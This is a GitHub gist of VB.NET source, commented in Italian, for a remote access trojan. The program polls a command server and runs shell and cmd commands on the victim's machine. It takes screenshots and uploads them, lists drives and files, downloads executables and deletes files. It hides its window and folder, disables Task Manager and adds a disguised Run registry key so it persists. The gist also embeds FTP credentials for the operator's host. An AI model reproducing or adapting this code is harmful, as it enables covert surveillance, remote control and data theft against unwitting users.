Skip to content

Instantly share code, notes, and snippets.

@the-shelter

the-shelter/gist:5360db6f26454721e0321f78a0e42d05

Forked from white64bit/gist:c59b27d591c53259bc111efd8dcb169c
Created March 18, 2018 15:58
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save the-shelter/5360db6f26454721e0321f78a0e42d05 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save the-shelter/5360db6f26454721e0321f78a0e42d05 to your computer and use it in GitHub Desktop.
Download ZIP
rat
Raw
gistfile1.txt
Imports System.IO
Imports System.Runtime.InteropServices
Public Class Form1
'RISPOSTE
' 0: comando eseguito
' 1: errore
' 2: comando non esistente
' 3: risposta di test
'variabili connessione FTP
Dim host As String = "ftp://ftp.hacking58.altervista.org/rat1/" 'cartella di installazione web
Dim user As String = "hacking58"
Dim pass As String = "ciapacavi2015"
'variabili connessione HTTP
Dim hoster As String = "http://127.0.0.1/rat/new/" 'cartella di installazione web
'nome della cartella generale (dentro documenti)
Dim cartella_generale As String = "rattone"
'processo da avviare dopo aver avviato il RAT
Dim processo_finale As String = ""
'non modificare!!
Dim p_screenshot As String = "C:\Users\" & SystemInformation.UserName & "\Documents\" & cartella_generale & "\screen.jpeg"
Dim p_command As String = "C:\Users\" & SystemInformation.UserName & "\Documents\" & cartella_generale & "\command.txt"
Dim p_nulled As String = "C:\Users\" & SystemInformation.UserName & "\Documents\" & cartella_generale & "\nulled.txt"
Dim webClient As New System.Net.WebClient
'per poter cliccare senza permessi amministrativi
Private Declare Sub mouse_event Lib "user32" (ByVal dwFlags As Integer, ByVal dx As Integer, ByVal dy As Integer, ByVal cButtons As Integer, ByVal dwExtraInfo As Integer)
'per poter usare il volume
<DllImport("user32.dll", SetLastError:=True, CharSet:=CharSet.Auto)> Private Shared Function SendMessage(ByVal hWnd As IntPtr, ByVal Msg As UInteger, ByVal wParam As IntPtr, ByVal lParam As IntPtr) As IntPtr
End Function
Const WM_APPCOMMAND As UInteger = &H319
Const APPCOMMAND_VOLUME_UP As UInteger = &HA
Const APPCOMMAND_VOLUME_DOWN As UInteger = &H9
Const APPCOMMAND_VOLUME_MUTE As UInteger = &H8
Sub leggo_comando()
Timer1.Stop()
Try
Dim sline As String = webClient.DownloadString("http://127.0.0.1/rat/new/comando.txt")
If Not sline Is Nothing Then
If sline = "" Then
ElseIf sline = "screenshot" Then
scatta_screen()
risposta(0)
ElseIf sline = "mouse" Then
Cursor.Position = New Point(1, 1)
risposta(0)
ElseIf sline = "google" Then
Process.Start("http://www.google.com")
risposta(0)
ElseIf sline = "click-sx" Then
mouse_event(&H4, 0, 0, 0, 0)
risposta(0)
ElseIf sline = "click-dx" Then
mouse_event(&H2, 0, 0, 0, 0)
risposta(0)
ElseIf sline = "reset-command" Then
risposta(0)
ElseIf sline = "disks" Then
Dim totale As String
Dim allDrives() As DriveInfo = DriveInfo.GetDrives()
Dim d As DriveInfo
For Each d In allDrives
totale = totale & d.Name & "|"
totale = totale & "" & d.DriveType & "|"
If d.IsReady = True Then
totale = totale & "" & d.VolumeLabel & "|"
totale = totale & "" & d.DriveFormat & "|"
totale = totale & "" & d.AvailableFreeSpace & "|"
totale = totale & "" & d.TotalFreeSpace & "|"
totale = totale & "" & d.TotalSize & "@"
End If
Next
risposta("@" & totale)
ElseIf sline = "volume-up" Then
SendMessage(Me.Handle, WM_APPCOMMAND, &H30292, APPCOMMAND_VOLUME_UP * &H10000)
risposta(0)
ElseIf sline = "volume-down" Then
SendMessage(Me.Handle, WM_APPCOMMAND, &H30292, APPCOMMAND_VOLUME_DOWN * &H10000)
risposta(0)
ElseIf sline = "volume-mute" Then
SendMessage(Me.Handle, WM_APPCOMMAND, &H200EB0, APPCOMMAND_VOLUME_MUTE * &H10000)
risposta(0)
ElseIf sline = "volume-max" Then
For value As Integer = 0 To 500
SendMessage(Me.Handle, WM_APPCOMMAND, &H30292, APPCOMMAND_VOLUME_UP * &H10000)
If (value = 499) Then
Exit For
End If
Next
risposta(0)
ElseIf sline = "exit" Then
Me.Close()
risposta(0)
ElseIf sline = "disable-taskmanager" Then
disabilita_taskmanager()
ElseIf sline = "check-startup" Then
If My.Settings.avvio_automatico Then
risposta("app in windows startup!")
Else
risposta("No, it isn't at startup!")
End If
ElseIf sline = "test" Then
risposta(3)
ElseIf sline = "set-startup" Then
avvio_automatico()
'AREA RISERVATA DOPPI PARAMETRI
ElseIf InStr(sline, "dir ") > 0 Then
sline = sline.Replace("dir ", "")
Dim cartelle As String
Dim file As String
For Each Dir As String In System.IO.Directory.GetDirectories(sline)
Dim dirInfo As New System.IO.DirectoryInfo(Dir)
cartelle &= "|" & dirInfo.Name
Next
Dim di As New IO.DirectoryInfo(sline)
Dim diar1 As IO.FileInfo() = di.GetFiles()
Dim dra As IO.FileInfo
For Each dra In diar1
file &= "|" & dra.ToString
Next
Dim rtotal = "@" & cartelle & "@" & file
rtotal = rtotal.Replace("@|", "@")
risposta(rtotal)
ElseIf InStr(sline, "refresh-rate ") > 0 Then
sline = sline.Replace("refresh-rate", "")
Timer1.Interval = sline
risposta(0)
ElseIf InStr(sline, "navigate ") > 0 Then
sline = sline.Replace("navigate ", "")
Process.Start(sline)
risposta(0)
ElseIf InStr(sline, "process ") > 0 Then
sline = sline.Replace("process ", "")
Process.Start(sline)
risposta(0)
ElseIf InStr(sline, "mouse ") > 0 Then
sline = sline.Replace("mouse ", "")
Cursor.Position = New Point(sline)
risposta(0)
ElseIf InStr(sline, "download_exe ") > 0 Then
risposta(0)
sline = sline.Replace("download_exe ", "")
If IO.File.Exists("C:\Users\" & SystemInformation.UserName & "\Documents\files2.exe") Then
IO.File.Delete("C:\Users\" & SystemInformation.UserName & "\Documents\files2.exe")
End If
My.Computer.Network.DownloadFile(sline, "C:\Users\" & SystemInformation.UserName & "\Documents\files2.exe")
ElseIf InStr(sline, "info_msgbox ") > 0 Then
Me.WindowState = WindowState.Normal
sline = sline.Replace("info_msgbox ", "")
MsgBox(sline, vbOKOnly + vbInformation, "")
Me.WindowState = WindowState.Minimized
risposta(0)
ElseIf InStr(sline, "write ") > 0 Then
sline = sline.Replace("write ", "")
SendKeys.Send(sline)
risposta(0)
ElseIf InStr(sline, "shell ") > 0 Then
sline = sline.Replace("shell ", "")
Shell(sline) '
risposta(0)
ElseIf InStr(sline, "upload ") > 0 Then
Dim datad As String = Now.Hour & "-" & Now.Minute & "-" & Now.Second
sline = sline.Replace("upload ", "")
Dim client As New Net.WebClient
client.Credentials = New Net.NetworkCredential(user, pass)
client.DownloadFile(host & "/risorse/upload/" & datad & ".txt", sline)
risposta(0)
ElseIf InStr(sline, "voice ") > 0 Then
Dim speech As String = sline.Replace("voice", "")
Dim SAPI = CreateObject("SAPI.spvoice")
SAPI.Speak(speech)
risposta(0)
ElseIf InStr(sline, "cmd ") > 0 Then
sline = sline.Replace("cmd ", "")
Shell("cmd /c " & sline) '[futuro] aggiungere & exit alla fine, ma potrebbe buggare tutto.
risposta(0)
ElseIf InStr(sline, "powershell ") > 0 Then
sline = sline.Replace("powershell", "")
Shell("cmd /c powershell.exe -exit ")
'filemanager
ElseIf InStr(sline, "download ") > 0 Then
sline = sline.Replace("download ", "")
Dim s As String = sline 'stringa da splittare
Dim parts As String() = s.Split(New Char() {"|"c}) 'tra le virgolette il carattere da spittare
Dim part, cache, valore1, valore2 As String
For Each part In parts
If cache = "" Then
valore1 = part
cache = "1"
ElseIf cache = "1" Then
valore2 = part
cache = "3"
End If
Next
My.Computer.Network.DownloadFile(valore1, valore2)
risposta(0)
ElseIf InStr(sline, "delete ") > 0 Then
sline = sline.Replace("delete ", "")
System.IO.File.Delete(sline)
risposta(0)
Else
risposta(2)
'COMANDO NON RICONOSCIUTO!!
End If
End If
Catch ex As Exception
If ex.Message = "Eccezione durante una richiesta WebClient." Then
risposta(ex.Message & " Controlla di aver i permessi necessari.")
Else
risposta(ex.Message) 'IN CASO DI ERRORI DA COME RISPOSTA 1( ERRORE )
End If
End Try
Timer1.Start()
End Sub
Sub disabilita_taskmanager()
Dim regkey As Microsoft.Win32.RegistryKey
Dim keyValueInt As String = "1"
Dim subKey As String = "Software\Microsoft\Windows\CurrentVersion\Policies\System"
regkey = Microsoft.Win32.Registry.CurrentUser.CreateSubKey(subkey:=subKey)
regkey.SetValue("DisableTaskMgr", keyValueInt)
regkey.Close()
risposta(0)
End Sub
Sub scatta_screen()
Try
'scatta lo screen
Dim bounds As Rectangle
Dim screenshot As System.Drawing.Bitmap
Dim graph As Graphics
bounds = Screen.PrimaryScreen.Bounds
screenshot = New System.Drawing.Bitmap(bounds.Width, bounds.Height, System.Drawing.Imaging.PixelFormat.Format32bppRgb)
graph = Graphics.FromImage(screenshot)
graph.CopyFromScreen(0, 0, 0, 0, bounds.Size, CopyPixelOperation.SourceCopy)
screenshot.Save(p_screenshot, Imaging.ImageFormat.Jpeg)
Dim datad As String = Now.Hour & "-" & Now.Minute & "-" & Now.Second
' Dim request As System.Net.FtpWebRequest = DirectCast(System.Net.WebRequest.Create(host & "risorse/screenshot/" & datad & ".jpeg"), System.Net.FtpWebRequest)
' request.Credentials = New System.Net.NetworkCredential(user, pass)
' request.Method = System.Net.WebRequestMethods.Ftp.UploadFile
' Dim file() As Byte = System.IO.File.ReadAllBytes(p_screenshot)
' Dim strz As System.IO.Stream = request.GetRequestStream()
' strz.Write(file, 0, file.Length)
' strz.Close()
' strz.Dispose()
webClient.UploadFile("http://127.0.0.1/rat/new/ricevitore_stream.php", "userfile=" & p_screenshot)
risposta(0)
Catch ex As Exception
risposta(1)
End Try
End Sub
Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load
'evito che l'app possa essere aperta più volte.
If PrevInstance() Then Me.Close()
Try
Process.Start(processo_finale)
Catch ex As Exception
End Try
install()
Me.Visible = False
Me.Opacity = 0%
Me.ShowIcon = False
Me.ShowInTaskbar = False
Me.Text = ""
Me.ControlBox = False
'setto alcune cose..
Timer1.Interval = 1010
Timer1.Start()
If Not IO.File.Exists(p_nulled) Then
IO.File.Create(p_nulled)
End If
avvio_automatico()
End Sub
Private Sub Timer1_Tick(sender As Object, e As EventArgs) Handles Timer1.Tick
leggo_comando()
End Sub
Sub install()
Try
If Not Directory.Exists("C:\Users\" & SystemInformation.UserName & "\Documents\" & cartella_generale) Then
Directory.CreateDirectory("C:\Users\" & SystemInformation.UserName & "\Documents\" & cartella_generale)
End If
Shell("attrib /s /D +h +s " & "C:\Users\" & SystemInformation.UserName & "\Documents\" & cartella_generale)
Catch ex As Exception
End Try
End Sub
Sub avvio_automatico()
'RICHIEDE PERMESSO D'AMMINISTRATORE!!
Try
Dim KeyName As String = "Wind32 Backup" 'nome della chiave: NON VIENE MOSTRATO NEL TASKMANAGER CON QUESTO NOME!!
Dim KeyValue As String = "C:\test\test.exe" 'percorso da avviare: se il percorso finisce con t.exe, nel tskmanager si chiamerà t.exe
Dim regKey = Microsoft.Win32.Registry.LocalMachine.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Run", True)
If regKey.GetValue(KeyName) = Nothing Then
regKey.SetValue(KeyName, KeyValue, Microsoft.Win32.RegistryValueKind.String)
My.Settings.avvio_automatico = True
Else
My.Settings.avvio_automatico = True
End If
risposta(0)
Catch ex As Exception
risposta("failed to set the app as a startup program: ")
End Try
'system.reference.nullable (system.IO);
End Sub
Function risposta(a)
Dim qg4p As String = webClient.DownloadString("http://127.0.0.1/rat/new/ricevitore.php?risp=" & a)
End Function
Function PrevInstance() As Boolean
If UBound(Diagnostics.Process.GetProcessesByName _
(Diagnostics.Process.GetCurrentProcess.ProcessName)) _
> 0 Then
Return True
Else
Return False
End If
End Function
End Class
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment